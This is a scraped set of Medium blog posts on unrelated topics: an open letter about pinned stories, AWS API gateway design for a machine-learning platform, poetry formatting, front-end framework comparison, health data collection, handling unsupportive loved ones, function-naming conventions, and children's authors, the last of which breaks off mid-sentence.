https://medium.com/escape-motivation/is-medium-worth-it-for-freelance-writers-4f9de8cc7ccb
['Jason Mcbride']
2020-10-15 07:53:07.286000+00:00
['Work', 'Freelancing', 'Business', 'Creativity', 'Writing']
An Open Letter To My Favorite Writer About Pinning Stories On Your Profile Page
A humble request from a dedicated reader I know this is going to sound weird so please don’t hold it against me but I’m having an awful time accessing your articles. Every time I show up on your page, I notice the entire first page of stories are pinned stories that you’ve been writing over the past 6 months. These are your greatest hits. The four stories on your profile page are all pinned. The next page has four more pinned stories. The third page had four more pinned stories. I only find your newest post on the fourth page. This morning, I found your new post about adopting stray cats on the fifth page. It took me 8 minutes to get to your newest story. I don’t mind doing this for you and will continue to wade through all your pinned posts but I have a humble request for you today? Can you have a few less pinned posts so we see your latest article towards the top of your profile page? Reading your stories used to take a few minutes but now it’s taking me 8 minutes to even get to your latest post. I have to stumble through all of your greatest hits before I find what I’m looking for. Only after the 8 minutes do I get to your post and spend another 7 minutes reading it. What used to take me 7 minutes takes closer to 15 these days. I’m asking for your assistance and come to you with the most simple request to put your latest story on page 2 or at least page 3 of your profile. If you can help me cut down the searching time for your newest post by half, I would be ever so grateful. An earnest plea to get some of my time back Don’t get me wrong. I have nothing against your 16 pinned posts but I just would like to get in, read and get out. Currently, it feels like I need to plan a trip to the city known as your profile page. I have no google map on how to get there and little instructions when I do there. I go around in circles searching through publication dates to find your most recent post. Posting a few less of your pinned posts upfront will help me get to what I’m looking for sooner. I’m humbly requesting that you give me a little bit more of my time back. Each 4 minutes that I can save from finding your most recent post allows me to read someone else’s post or even one of your old posts. I mean no offense or harm. I am no hater or troll. I come with genuine gratitude and an earnest plea. Thank you for understanding and I look forward to seeing your latest post soon. I hope I won’t have to spend the regular 8 minutes to find it by going through all the pinned posts. Your reader and fan, Pinned Out p.s. This is in no way a bribe but I just donated another $20 to your KoFi account. You can use it for coffee or to pay for your Medium subscription or for groceries. I ask nothing in return. You don’t have to move your latest story to the top of the profile page but if you did, I would be forever grateful and there may be more KoFi donations coming your way.
https://medium.com/the-haven/an-open-letter-to-my-favorite-writer-about-pinning-stories-on-your-profile-page-666ac9cee9d4
['Vishnu S Virtues']
2020-12-09 22:29:13.236000+00:00
['Language', 'Creativity', 'Psychology', 'Culture', 'Lifestyle']
Implementation of the API Gateway Layer for a Machine Learning Platform on AWS
After defining some of the main concepts in the API world in the previous article, I will talk about the different ways of deploying an API Gateway for the Machine Learning platform. In this article, I will use the infrastructure and software layers designed in one of my previous articles. You may want to go through it to have a clearer view of the platform’s architecture before proceeding. As a reminder, the scope of this series of articles is the model serving layer of the ML platform’s framework layer. In other words, its “API Gateway”. Scope of this series of articles, by the author Now let’s start designing! A question may arise: If we are in an AWS environment, why not just use the fully managed and serverless AWS API Gateway? You never know if you don’t try. So let’s try this! 1 | Just the AWS managed API Gateway Here’s how AWS API Gateway could be placed in front of an EKS cluster. AWS API Gateway for the API Gateway layer, by the author First of all, AWS API Gateway is a fully managed service and runs in its own VPC: so we don’t know what’s happening between the scenes or any details about the infrastructure. Thanks to AWS documentation, we know that we can use API Gateway private integrations¹ to get the traffic from the API Gateway’s VPC to our VPC using an API Gateway resource of VpcLink². The Private VpcLink is a great way to provide access to HTTP(S) resources within our VPC without exposing them directly to the public internet. But that’s not all. The VpcLink is here to direct the traffic to a Network Load Balancer (NLB). So the user is responsible for creating an NLB which serves the traffic to the EKS cluster. With the support of NLB in Kubernetes 1.9+, we can create a Kubernetes service of type LoadBalancer With an annotation indicating that It’s a Network load balancer³. That would be a correct setup for the AWS API Gateway on EKS. We could as well benefit from WAF support for the managed API Gateway. The problem with this setup is we have the power of an API Gateway, but it’s far away from our cluster and our services. If we want to use a specific deployment strategy for each service, it would be great if this is done very close to the service (like in the service’s definition itself!). 2 | API Gateway closer to our ML models! Here’s another way of doing things. Design components: AWS API Gateway + NLB + Ambassador API Gateway. AWS API Gateway Combined with Ambassador for the API Gateway layer, by the author In this setup, we put an open-source API Gateway solution closer to our services. I will talk in detail about Ambassador in a future article. For now, let’s just say it’s a powerful open-source API/Ingress Gateway for our ML platform that brings the API Gateway’s features closer to our models. So do we really need the AWS API Gateway? Not really… One downside though, we will lose the WAF advantages for sure if we don’t use the AWS API Gateway. But maybe we can optimize it more! 3 | Eliminate the AWS API Gateway! So let’s eliminate the AWS API Gateway. Design components: NLB in public subnet + Ambassador API Gateway. Public AWS NLB Combined with Ambassador for the API Gateway layer, by the author We just need to put the NLB in a public subnet so that we can receive the public traffic. However, NLB doesn’t understand HTTP/HTTP(s) traffic, it allows only TCP traffic, no HTTPS offloading, and they have none of the nice OSI’s layer 7 features of the Application Load Balancer (ALB). Plus, with an NLB, we still can’t have the advantages of WAF. 4 | Our final design! 
So, here’s the final setup. Design components: ALB in public subnet + WAF + NLB in private subnet + Ambassador API Gateway. Final setup for the API Gateway layer, by the author As WAF integrates well with Application Load Balancer (ALB), why not get an ALB in front of the NLB. We can get that NLB back to its private subnet as well. One thing to pay attention to though: In this setup, AWS ALB cannot be assigned a static public IP address. So, after some time, the ALB’s IP changes and we lose access to the platform. Two possible solutions: 1. Summon the almighty Amazon Route53: We need to use the DNS name of the ALB instead of its changing IP addresses. To do this: a. We have to migrate our nameservers to Route53 if it’s not already the case. b. Pay attention to mails redirection: Route53 is only a DNS resolver and does not redirect emails. A solution for this could be to use an MX record and a mail server (like Amazon WorkMail). 2. Use AWS Global Accelerator: we never get bored with Amazon. Recently, Amazon launched this new service which could easily solve such a problem. A global accelerator with 2 fixed IPs and a unique DNS name will receive the traffic and direct it to an endpoint group containing our ALB. Here’s a detailed guide on how to use this new feature. Conclusion In this article, I tried to study different deployments of an API Gateway for the Machine Learning platform. Starting from simply using an AWS API Gateway, I tried to find an optimal setup with maximum use of AWS advanced features like WAF. In the next article, I will discuss in detail Ambassador and various concepts behind its existence. If you have any questions, please reach out to me on LinkedIn. [1] https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-private-integration.html [2] https://docs.aws.amazon.com/apigateway/api-reference/resource/vpc-link/ [3] https://kubernetes.io/docs/concepts/services-networking/service/#aws-nlb-support
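As a small addendum to the Route53 option described above, here is a hedged boto3 sketch of the alias record that keeps a friendly hostname pointed at the ALB even as its IPs change (the hosted zone ids, domain name, and ALB DNS name are all placeholders, not values from the article):

import boto3

route53 = boto3.client('route53')

# UPSERT an alias A record so the hostname tracks the ALB's DNS name
# instead of its changing IP addresses
route53.change_resource_record_sets(
    HostedZoneId='Z111111QQQQQQQ',  # placeholder: your public hosted zone
    ChangeBatch={
        'Changes': [{
            'Action': 'UPSERT',
            'ResourceRecordSet': {
                'Name': 'ml.example.com',
                'Type': 'A',
                'AliasTarget': {
                    # placeholder: the ALB's canonical hosted zone id for its region
                    'HostedZoneId': 'Z32O12XQLNTSW2',
                    'DNSName': 'ml-platform-alb-1234567890.eu-west-1.elb.amazonaws.com',
                    'EvaluateTargetHealth': False
                }
            }
        }]
    }
)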
https://medium.com/swlh/implementation-of-the-api-gateway-layer-for-a-machine-learning-platform-on-aws-589381258391
['Salah Rekik']
2020-11-19 17:33:26.913000+00:00
['Machine Learning', 'Api Gateway', 'AWS', 'Technology', 'Cloud Computing']
A Comprehensive Guide To Publishing Poetry On Medium
A Comprehensive Guide To Publishing Poetry On Medium Best Practices, Tips & Tricks, and What Not To Do Photo by NordWood Themes on Unsplash This is for anyone who publishes poetry or plans to, on Medium. Offline poetry is something different. The formatting options and creative iconography are endless. In our journals or on our typewriters, or even in a document, we can use spacing for emphasis. We can freely indent on a piece of paper the exact amount we think is necessary to tell a small part of the story, without using more words. But this is Medium. When it comes to poetry on Medium, there aren’t many formatting options and I know you may think this is an odd thing to say, but I think that’s a good thing. A site like this is visually pleasing because of its consistency. Even though we are all different as writers, the limited formatting options make the screen pretty similar no matter who you are reading. Poets don’t like this. Poets on Medium try to come up with ways to use formatting to enhance their work, but the truth is, there isn’t much you can do. And isn’t it a better thing that the full breadth of power has to come from our words on here? I think it is. Would I like an easier way to indent once in a while? Actually, no, but I bet some would. But we can only work with the options we are given. Part of my goal in writing this is selfish. I edit and publish so much poetry between Assemblage and Loose Words, that I wanted to give an overview of the errors I see the most. And some of these things aren’t errors so much as oversights or just something missed when you are new to the platform. Either way, it will help you as much as it will help me. Hopefully more.
https://medium.com/loose-words/a-comprehensive-guide-to-publishing-poetry-on-medium-ae2535e29b43
['Jonathan Greene']
2020-05-27 12:24:25.524000+00:00
['Guides And Tutorials', 'Poetry', 'Creativity', 'Writing', 'Poetry On Medium']
Angular vs. React vs. Vue
Angular vs. React vs. Vue: Spot the Difference The comparison of these three frameworks (Angular versus React versus Vue) will help you to have a clear perspective regarding the perfect framework as per your project requirements. When you have an important project with several bottlenecks, you require a comprehensive understanding of these technologies so you can choose the apt framework. That’s the basis of this article: to detail the essential factors for each framework and to help you to pick the right one among them. 1. Angular vs. React vs. Vue: Popularity According to a 2019 Stack Overflow survey, React is the most desired framework (74.5% of developers preferring it), and Vue is right behind it with 73.6% of developers embracing it. Both React and Vue have a similar number of users. The number of users for Angular isn’t the same as before, but, even so, more than 50% of users still love Angular. Google Trends can dictate the popularity of Angular, React, and Vue among developers. As per Google statistics, React is the most popular framework, followed by Angular and Vue. React easily grabs the attention of developers because of its well-built and secure structure. Although, there’s no denial that Angular and React are used by big names in the software industry: Google uses Angular for their projects, whereas brands like Airbnb, Dropbox, Facebook, WhatsApp, and Netflix are keen on React for development. 2. Angular vs. React vs. Vue: Performance Performance is considered to be the most prominent aspect for a front-end developer during development, whether you choose Angular, React, Vue, or any other framework. And to determine that, you need to understand the performance. Let me help you with that. It is a known fact that DOM is seen as the UI for frameworks. It’s a vital fact that React and Angular take different methods to modernize HTML files, but Vue is the one that brings out the best result. Angular The good: Angular is the most popular framework for JavaScript because it practices real DOM, and it’s the best option for single-page-applications due to the coherent update. Apart from that, Angular goes with a Two-Way Data binding process that recreates the changes from the Model into the views in a safe, efficient, and automatic method. Liability: Due to several features of this framework, during the translation of heavy applications, it slows down the performance. React: Goods: React is a front-end library that applies the Virtual DOM to enhance the performance for all size applications that require frequent content up-gradation, such as Instagram. The base of React is single-direction data flow to have better authority over the project. Liability: The constant changes and development in React demand upgraded and skilled programmers regularly, so sometimes the tech giants are not comfortable working with React. Vue: Goods: Being the youngest member Vue has its perks because Vue doesn’t need to deal with those issues which earlier arose in Angular and React. Vue.js development company provides high performance and memory allocation with all the enhanced features. Liability: Vue has the smallest community support because it’s a novice member of the JavaScript family. 3. Angular vs React vs Vue: Top Use Cases for web development Angular Angular is actively used in its AdWords applications for maximizing the performance because Google is the founder of it. These are the famous web resources that utilize Angular, such as Lego, PayPal, Nike, Weather.com, and The Guardian. 2. 
React It was specifically designed for Facebook, and it still uses React actively for various product creation. The list of React users goes as, Instagram, Twitter, Whatsapp, and WordPress as well. 3. Vue.js Vue doesn’t have strong allies to implement its products, like Angular and React. Although, in a short span, popular brands such as GitLab, 9Gag, Nintendo, and Grammarly are associated with Vue due to its flexibility. 4. Angular vs React vs Vue: Framework size Angular (around 500 KB): Angular development has a wide range of features that enables developers to create templates to test utilities. For your next project if you want to develop large-scale feature applications, then Angular is the one for you. 2. React (around 100 KB): React is the right framework for modern web development because, with React development, you don’t have to worry about the big spectrum of libraries. 3. Vue (around 65 KB): As per the size of Vue framework and library, it’s suitable for the light-weight application, and for the complex application you need to go with Angular development. 5. Angular vs React vs Vue: Learning curve The learning curve is defined as the capability of users to write codes in a specific programming language. It’s time for us to understand the learning curve of each framework. Vue: Among these three frameworks, Vue.js has the easiest learning curve. And the reason is it’s nearest to the JavaScript basics and HTML. You can consider the start of this task as easy as adding an import to HTML. However, as you create a more complex application, it starts to get complicated. But to tackle the complexity you should use .vue file for the project. 2. React: The learning curve of React.js has a medium to steep learning curve compared to Angular and Vue. React has an “everything is JavaScript” strategy. However, it still has these two essential elements that make the learning curve steeper. ES6 Syntax that syncs perfectly with react, although it’s complex for the beginner. React uses JSX syntax, which is a mixture of JavaScript and HTML, that confuses a lot of users because it forms the image of HTML and works like JavaScript. 3. Angular: The use of TypeScript makes the learning curve of Angular steepest among these three frameworks. Also, the components, syntax, and modules look different than you used to before. Although, the powerful features of it help Angular developers to build applications following certain coding patterns. 6. Angular vs React vs Vue: Scalability Concerning front-end development, scalability often relates to the ability to maintain expanding functionality. That means, applications must increase in size and complexity, and the development platform needs to support such extension. The community developers’ is consistent about both Angular and React, that they both are the best for the task when it’s about building scalable applications. Angular focuses on scalability with its modular development composition, while React obtains to go with a component-based method for the result. However, in terms of scalability, Vue is way too much behind, due to its template-based syntax. As you might know, templates do not go along with large applications as much as JavaScript components. The Choice is Yours There is no doubt that all three frameworks have their perks and downsides. Choosing the best one of these three frameworks entirely depends on the requirements of your project. 
For instance, if you are building a large application, Angular is the one for you, provided you are comfortable with TypeScript. Otherwise, React is also well suited to large apps. And if you like adventure and want to experiment with something newer and promising, Vue.js is your framework. I hope this comparison of Angular vs. React vs. Vue helps you pick the best JavaScript framework for your next development project.
https://medium.com/swlh/angular-vs-react-vs-vue-802a7c5f7e50
['Nelly Nelson']
2020-11-02 14:33:13.117000+00:00
['Angular', 'Programming', 'React', 'JavaScript', 'Vuejs']
To Be or Not To Be (2020)
https://medium.com/merzazine/to-be-or-not-to-be-2020-3a2f194ae0f
['Vlad Alex', 'Merzmensch']
2020-11-20 11:03:32.338000+00:00
['Videos', 'Artificial Intelligence', 'Music', 'Art', 'Culture']
VJ Loop | RGB Plasmas
This blog takes the broadest conception of sound design possible including visual effects because audio likes video.
https://medium.com/sound-and-design/vj-loop-rgbplasmas-424755ae248b
["Michael 'Myk Eff' Filimowicz"]
2020-12-29 02:26:36.212000+00:00
['Design', 'Flair', 'Technology', 'Creativity', 'Art']
Here’s Why We Need Health Data Collection
Opinion Here’s Why We Need Health Data Collection Tech can enable valuable experiences with your health data Image by Lukas on Unsplash Our data is constantly collected, from YouTube history to calendar reminders to daily workouts, all possible due to rapid technological growth. According to the National Center for Biotechnology Information, 58% of U.S. cellphone users have downloaded a health-related app onto their devices, but an even greater percentage already had pre-installed software that saved health data (Krebs & Duncan, 2015). Your data, combined with millions and even billions of other people’s, creates big data, or incredibly large datasets. Over time, methods of data collection have evolved, paralleling the developments in science and technology that have allowed companies to harness massive datasets shaping the modern products at our fingertips. As technology becomes an even stronger influence in our daily lives, it is imperative to understand the effects of this kind of data collection from the technological lens and consider multiple perspectives within it. Image by James on Unsplash A prime stakeholder in the debate of health data collection is undoubtedly major technology companies, namely Apple, Amazon, Facebook, Google, and Microsoft. These companies see healthcare as a brilliant but somewhat untapped opportunity to expand innovation and spur economic growth. Jia Low, an author at TechHQ, an independent current technology and business news site, examines why these companies are eager for health data. She discusses that in 2019, Google partnered with Ascension, one of the largest healthcare providers in America, and acquired FitBit. Both of these sources accumulated heaps of patient records from around the world. With this data, Google claims it wants to aid doctors and hospitals in managing their patients more effectively and quickly via electronic health records (EHRs), which make up an astounding 80% of health records today. Amazon is a strong competitor in cloud storage, and its 2018 purchase of the online prescription service PillPack signals its push to target healthcare. The wealthiest tech giant is Apple, which puts privacy at its forefront. Apple is investing in users’ health data to make its Health platform a seamless, more reliable “middleman” in personal health management. Portable devices like the Watch and iPhone (both of which teem with health apps and features) have had positive impacts. Low cites that in 2019, the Watch detected a biker’s severe fall and contacted 911, thus saving his life. Mark Zastrow, a well-regarded writer from the prestigious peer-reviewed Nature scientific journal, covers Apple and Google’s recent collaboration on their joint COVID-19 contact tracing app that will provide more accurate feedback on infected people and notifications for those who came into contact with someone who tested positively. He points out that together, they have solved many of the privacy and efficiency issues of prior methods by implementing encrypted keys and eliminating access to personally-identifying data. Both Low and Zastrow agree that with appropriate privacy measures — encryption, pseudonyms, on-board processing, strong algorithms, and the like — technology companies have just intentions and share a goal of inventing for the betterment of society. It is clear that technology companies provide new innovations targeted to help manage the health of their users, but it is crucial to investigate how users incorporate them into their lives. 
According to a study by Rock Health from 2015 to 2018 on 4,000 U.S. adult respondents, users have adopted these tools at a record rate: in 2018, 89% of those surveyed used one or more health tools on their devices, an increase from 80% in 2015 and proof that user traction has improved. Authors Sean Day and Megan Zweig from the nationally-recognized technology and health funding company Rock Health construct their argument by discussing the common means through which data is collected: live video telemedicine, wearables, mobile tracking, online reviews, and online health information. In 2018, wearable use began shifting more towards managing health conditions and diagnoses rather than tracking fitness. Additionally, the authors note positive impact of health data collection by reporting that users rated the tools an average of 4.1 out of 5 stars, a high performance. Image by Daria on Unsplash A second way to explore users’ opinions on technology companies handling their health data is trust levels. Lance Lambert, a graduate from Duke University and the University of Cincinnati working at Fortune as a data analyst, reports on a study conducted by Fortune that surveyed 1,267 randomly selected U.S. adults. Lambert first describes that many respondents liked health tracking apps and devices, because it was “illuminating” to “see [their lives] told by the minute.” He clarifies that unfortunately, many users are unaware that their data is stored; even though they technically provide consent before using health data collection apps, they often disregard the “fine print.” It was found that 40% of the respondents are fully willing to have their data utilized by Amazon and Apple, with smaller percentages for Google and Facebook. Interestingly, this demonstrates that many people are in a paradox: they utilize digital health data tools widely and regularly but are also wary of technology companies using that data to their, and potentially the public’s, benefit. Image by Campaign Creators on Unsplash A third role involved heavily is healthcare professionals, specifically doctors. James Gaston, the senior director of data modeling at Healthcare Information and Management Systems Society, says, “[Our cultural definition of healthcare] is moving away from a brick-and-mortar centric event to a broader, patient-centric continuum encompassing lifestyle, geography, social determinants of health and fitness data in addition to traditional healthcare episodic data.” The sheer volume of health data being collected implies that it accurately represents its target audience, significantly improving a more time-consuming, costly, and ineffective policy of direct doctor-patient communication. He asserts that if limited data is collected by only doctors and analyzed at too granular of a level, patterns will be difficult to spot and consequently, innovation will decrease. Medical data from users’ devices combined with doctor-specific sessions incorporates a large array of different types of data — from search queries, app statistics, and wearable outputs to environmental factors and individual lifestyles — and thus provides more informative results. This process of leveraging big data and technology to assist individualized healthcare without a doctor physically present is called telemedicine. 
Constant collection streaming through patients’ devices, as proved with Apple and Samsung users, can allow doctors, families, and users themselves to consistently track overall health and improve care, says Valarie Romero a telemedicine professor at The University of Arizona. Other scholars oppose her. Gina Neff, a senior research fellow and Associate Professor in the Department of Sociology at the University of Oxford, quotes an anonymous physician in her survey: “I don’t need more data; I need more resources.” She explains that big data is valued in various ways by different people, so some professionals believe data-intensive solutions take excessive time away from providing quality care. Neff claims that creating healthcare solutions built off of vast data collection does not assess multiple viewpoints well. It is evident that technology companies, users, and healthcare professionals have different stances on the topic of digital health data collection through devices. While technology companies have a favorable outlook as they work to develop new products that can be beneficial, citizens have varying levels of trust that their data is used for straightforward purposes. In the healthcare industry, some propose data collection increases efficiency, accuracy, and scalability, and others say it undermines the abilities of the professionals themselves. Cumulatively, these perspectives suggest that health data collection from devices — when active consent, privacy, and personal choice are ensured — is generally positive for both the public and technology companies.
https://towardsdatascience.com/heres-why-we-need-health-data-collection-139cc2aea3ff
['Asmi Kumar']
2020-12-22 14:18:04.439000+00:00
['Data', 'Health', 'Technology', 'People', 'Education']
What to Do When Your Loved Ones Don’t Support Your Art
What to Do When Your Loved Ones Don’t Support Your Art Don’t try to hire them for a job they don’t want. Photo by Thought Catalog on Unsplash The Pain is Real One of the hardest things about being a writer or any kind of creative is when the people we care about don’t support us. When those who are closest to us snub or poo-poo our creative efforts, it hurts — a lot. I have plenty of people in my life who cheer me on as I pursue my passion for writing. For that, I’m grateful. However, there are some people I expected to be in my corner who aren’t having it. Not even a little bit. This has been a source of hurt for me for three years since I’ve started writing again. I’ve been working through this rejection and making strides in coming to terms with it. Until this week, that is. I got a notification that someone close to me who rarely interacts with my blog’s Facebook page commented. I was so excited. When I opened the notification to read it, it was to point out there was a typo in my post. Wow. Really? You never support anything else I do, but you take the time to point out a typo? Nope. Just nope. At first, I responded with a good-natured reply after fixing my typo. I even used a smiley emoji, though I wasn’t feeling smiley. Upon further reflection, I deleted the comment and my reply. Why? Because I don’t need people embarrassing me on a platform I’ve worked hard to create. It wasn’t about the typo. I make them from time to time. We all do. It was that this person’s only effort to reply to my work was to point out a mistake. The plus side is it spurred me to write this article. So there’s that. How to Respond Maybe you’re in the same boat. Maybe there are people you would love to have support you who just aren’t that into what you’re doing. Maybe you have people who ignore you or point out your typos. Yeah, it stinks. I have some good news and a bit of advice. They aren’t your people when it comes to your creative pursuits. Don’t try to hire them for a job they don’t want. I’ve known this for a while, but today’s public typo comment struck that old nerve. When these things happen, here’s how we can choose to respond. DON’T RESPOND — You aren’t obligated to justify yourself and your art to anyone. Not even those close to you. If others don’t share your enthusiasm, don’t waste time worrying about it like I have in the past (or this week). Keep creating. Know that you are good enough without their support. You can and will succeed without their help. APPROACH THEM — If you feel strongly enough and believe saying something would help (in my case I knew it would not), say something. In a non-defensive way, call or sit the person down and share how important what you are doing is to you. No texting, no emails — voice contact only. Let the person know that his or her lack of support hurts. It could be that those who aren’t supporting you simply don’t realize how you feel. FIND YOUR TRIBE — The best people for supporting creative people are other creative people. Join a local writers’ or artists’ group. Find online groups to connect with other creatives. Even if you have the support of those you care about, other artists will support you in a special way that your loved ones cannot. We are a quirky, caring, supportive bunch. THANK YOUR SUPPORTERS — Remember to thank those who care about what you are doing. My husband is the absolute best. He is endlessly encouraging and loving. I know I am fortunate that the person closest to me in all the world supports me. 
Not everyone has this kind of support. I thank him and others for believing in me because it’s only right to acknowledge their kindness. Be a Cheerleader The best response to negativity is positivity. Please don’t get me wrong. This is grueling work. Avoiding a claws-out confrontation is not easy when you feel hurt. This is especially true when you are passionate about your work. Let the naysayers do their thing and find someone to encourage instead. If you know how it feels to be overlooked or snubbed by those you care about, make sure you don’t do the same. Acknowledge those who are working hard to create something. Read their writing. Buy their art. Go to their concerts. Share their work with others by social media or word of mouth. I’ve gotten into an online critique group with two other women and it has been wonderful. I met them through an online writers’ group. We have never met but have been critiquing each other’s work and cheering each other on. A couple of years ago, I started a small local writers’ group and meet with them monthly. We are strengthened and encouraged by our time together. As the proverb says, iron sharpens iron. Becoming a member of Medium and giving support through claps, comments, and highlights is a great way to be a cheerleader. In doing so, you are helping other writers make money as well. What could be better? Take heart. Not everyone is going to love what you are doing. Not everyone will understand and acknowledge your passion. Choose wisely in how you respond and above all, don’t stop creating. The world needs your art.
https://medium.com/swlh/what-to-do-when-your-loved-ones-dont-support-your-art-856cdc842f5
['Tracy Gerhardt-Cooper']
2019-06-16 23:11:06.279000+00:00
['Relationships', 'Creativity', 'Life Lessons', 'Writing', 'Self Improvement']
3 UX Design Principles for Better Data Visualization
Three UX Design Principles 1. Just KISS I am sorry it is not what you are thinking ;) KISS means “keep it simple, stupid”. Good user experience doesn’t mean stacking all the beautiful graphics together. It looks amazing, but your attention is dispersed everywhere on the screen, and to be honest, it is tiring. It is also not about creating complicated graphs that show off how scientific and professional they look, that only scare people off. There are some graphs we’d better avoid using based on this principle. For example, only use 3D chart if it is really necessary. Most of the time, the third dimension just doesn’t serve any purpose. Instead, it makes the visuals so heavy and thick to digest. Another example is secondary y-axis, it takes more frictions and efforts to understand which axis the chart is mapped against. Like this chart below, can you easily tell which axis is for the bar chart and which one is for the line chart within 3 seconds? Therefore, keep it minimal and eliminate clutter, these simple tricks can additionally make your dashboard looks cleaner instantly: 1. Use no more than five colours (or 3 main colours) in one dashboard. 2. Un-bold chart captions and titles. Make them concise. 3. Remove chart gridlines and borders. Delivering knowledge is not about showing off how skilled you are, rather it is to highlight common understanding between deliverers and receivers. Just KISS! 2. Form Follows Function Built upon the previous point, it is essential to design the dashboard that actually delivers the message to the receivers, hence it is required to meet the key objectives. That is, to prioritize what are the core functions and insights the dashboard needs to demonstrate. Then choose the forms correspondingly. Emphasize on selecting the most appropriate chart that is aligned with the data type. Bar chart compares the measures of categorical data. Histogram looks very similar to the bar chart because it also consists of bars. However, instead of comparing the categorical data, it breaks down a numeric data into interval groups and shows the frequency of data fall into each group. Line chart indicates trend and development of variables over time, usually represented by one numeric data against a date-type variable. It is commonly used in time series analysis. Pie chart is used to represent the percentage and weight of categorical data. Intuitively depict proportions of a whole. Map shows numeric data that can be grouped by regions. Using gradient colors is a great way to visualize the density difference in various geographical locations. Scatter plot visualizes the correlation between two numeric variables. Common to identify relationships such as linear regression, logistic regression etc. These are the most basic charts. There are more complicated graphs that perform advanced analytics such as heatmap, treemap, box plot etc … That’s another story that is definitely worth diving deeper. However, it is not the main focus of this article. Most importanly, it is to always keep the users in mind and be clear about the objectives. It doesn’t matter how fancy the form is if it doesn’t bring any functions. 3. Take the Advantage of Hierarchy Hierarchy is essential in terms of indicating viewers where to look first. It can be constructed implicitly using size, color, position etc. Size: Large and bold fonts are more likely to stand out whereas small and thin texts are less prioritised. 
If we are using text to display statistics, make sure it stands out from other text elements such as titles and captions. This principle goes beyond text: using different sizes of shapes also creates a hierarchical layout. Position: Human visual perception means we are most likely to look at the top-left corner or the center of the screen. Therefore, the most important information should be placed in the areas where viewers direct most of their attention. Color: Bright colors are more likely to stand out, whereas pale colors recede into the background. Another general rule is that a color that breaks consistency will be perceived as the important message. Therefore, use contrast to make the key information grab your audience's attention.
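To make the decluttering and hierarchy tips above concrete, here is a small Matplotlib sketch (my own illustration, not code from the article) that removes gridlines and borders, keeps the palette to two colours, and lets a single highlighted bar carry the hierarchy:

import matplotlib.pyplot as plt

categories = ['A', 'B', 'C', 'D']
values = [12, 30, 18, 9]

fig, ax = plt.subplots()

# One bright highlight colour, pale grey for the rest (well under five colours)
colors = ['#e4572e' if v == max(values) else '#d0d0d0' for v in values]
ax.bar(categories, values, color=colors)

# Remove chart gridlines and borders to cut clutter
ax.grid(False)
for spine in ['top', 'right', 'left']:
    ax.spines[spine].set_visible(False)

# Concise, un-bolded title placed where the eye lands first
ax.set_title('Sales by category', fontsize=11, fontweight='normal', loc='left')
ax.set_ylabel('Units')

plt.show()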
https://medium.com/analytics-vidhya/3-ux-design-principles-for-better-data-visualization-70548630ff28
['Destin Gong']
2020-09-16 04:04:43.714000+00:00
['Data', 'Data Analysis', 'UX', 'Design', 'Dashboard']
A Useful Framework for Naming Your Classes, Functions, and Variables
Actions Are the Heart of a Function
Actions are the verb part of your function name. They're the most important part in describing what the function does.

- get
Accesses data immediately (i.e., a shorthand getter of internal data).

function getFruitsCount() {
  return this.fruits.length;
}

- set
Declaratively sets a variable from value A to value B.

let fruits = 0

function setFruits(nextFruits) {
  fruits = nextFruits
}

setFruits(5)
console.log(fruits) // 5

- reset
Sets a variable back to its initial value or state.

const initialFruits = 5
let fruits = initialFruits

setFruits(10)
console.log(fruits) // 10

function resetFruits() {
  fruits = initialFruits
}

resetFruits()
console.log(fruits) // 5

- fetch
Requests data, which takes time (e.g., an async request).

function fetchPosts(postCount) {
  return fetch('https://api.dev/posts', {...})
}

- remove
Removes something from somewhere. For example, if you have a collection of selected filters on a search page, removing one of them from the collection is removeFilter, not deleteFilter (and this is how you'd naturally say it in English as well):

function removeFilter(filterName, filters) {
  return filters.filter(name => name !== filterName)
}

const selectedFilters = ['price', 'availability', 'size']
removeFilter('price', selectedFilters)

- delete
Completely erases something from the realm of existence. Imagine you're a content editor, and there's that notorious post you wish to get rid of. Once you click the shiny delete-post button, the CMS performs a deletePost action, not a removePost one.

function deletePost(id) {
  return database.find({ id }).delete()
}

- compose
Creates new data from existing data. This is mostly applicable to strings, objects, or functions.

function composePageUrl(pageName, pageId) {
  return `${pageName.toLowerCase()}-${pageId}`
}

- handle
Handles an action. Often used when naming a callback method.
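The example for handle is not included in this copy of the post, so here is a small illustrative sketch (the link element and log message are my own, not necessarily the author's original snippet):

function handleLinkClick() {
  console.log('Clicked a link!')
}

link.addEventListener('click', handleLinkClick)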
https://medium.com/better-programming/a-useful-framework-for-naming-your-classes-functions-and-variables-e7d186e3189f
[]
2020-12-24 15:17:13.007000+00:00
['Python', 'Software Development', 'Programming', 'Software Engineering', 'JavaScript']
The 3 Children’s Authors You Must Read
Children’s literature is one of the most sacred types of writing in the entire medium. Kids are so impressionable and curious. They want to know the answers to the big questions, taking in all of the information available to them like a sponge. It takes a truly special author to tap into their own childlike imagination, remembering what intrigued them so many years ago about the world around them. What makes a high quality book for young ones? Does it teach them about history and people? Does the story have the characters that the reader can relate to, while also not being too harsh about the realities of life? Is the language overblown with large vocabulary that is not yet understandable? At the same time, kids are not stupid. The writer should never talk down to their audience. I wanted to present three children’s authors that I enjoyed growing up that I know others benefited from just as much as me. They write timeless stories that are still enjoyed to this day, and hopefully for many more generations into the future. Enjoy! Mary Pope-Osborne Author of one of the best-selling children’s series of the past 30 years, her Magic Tree House saga has been mixing culture, history, and fun into a magical mix for multiple generations of children. Jack and Annie are the brother-sister duo protagonists of the novels, allowing children of both genders to see themselves in the novels while reading about their various adventures. Pope-Osborne runs the gamut on historical and cultural references, sending the siblings back in time through their neighborhood tree house to an enormous set of locations and events. The American Civil and Revolutionary Wars, the sinking of the Titanic, the 1906 San Francisco earthquake, and the volcanic eruption of Mt.Vesuvius are just a sampling of the iconic time pieces that kids are introduced to in accurate and magical ways. History is something that people of all ages should educate themselves on more, so it is vital to kindle a love and interest in it from an early age. These books mix fantastical elements and fictional characters right into the nonfictional happenings of real life in a way that I’ve rarely seen in youth literature. By blurring the line between what’s real and what isn’t, the author convinces the child to have a lifelong love learning about the fascinating countries, mountains, languages, animals, disasters, and peoples that combine to make up our magical planet! Photo by Vincent Branciforti on Unsplash Andrew Clements Known most for the 1996 best-seller Frindle, detailing a student’s made-up term for a pen, Andrew Clements had a unique ability to get inside the mind of the average 11 year old and put their thoughts and emotions onto the page for his readers. His literature hones in on a single protagonist who usually butts heads with an adult somewhere in the classroom or domestically. Nothing too serious, but the problems all give enough food for thought to munch on for a couple hundred pages. The kid who stars in the work is given respect by being put on equal footing with the adult who is opposing them. By taking the authority figure and putting that person on equal terms with the younger student, Clements makes both characters see eye-to-eye a little better. By the end of the novels, the child protagonist has grown up 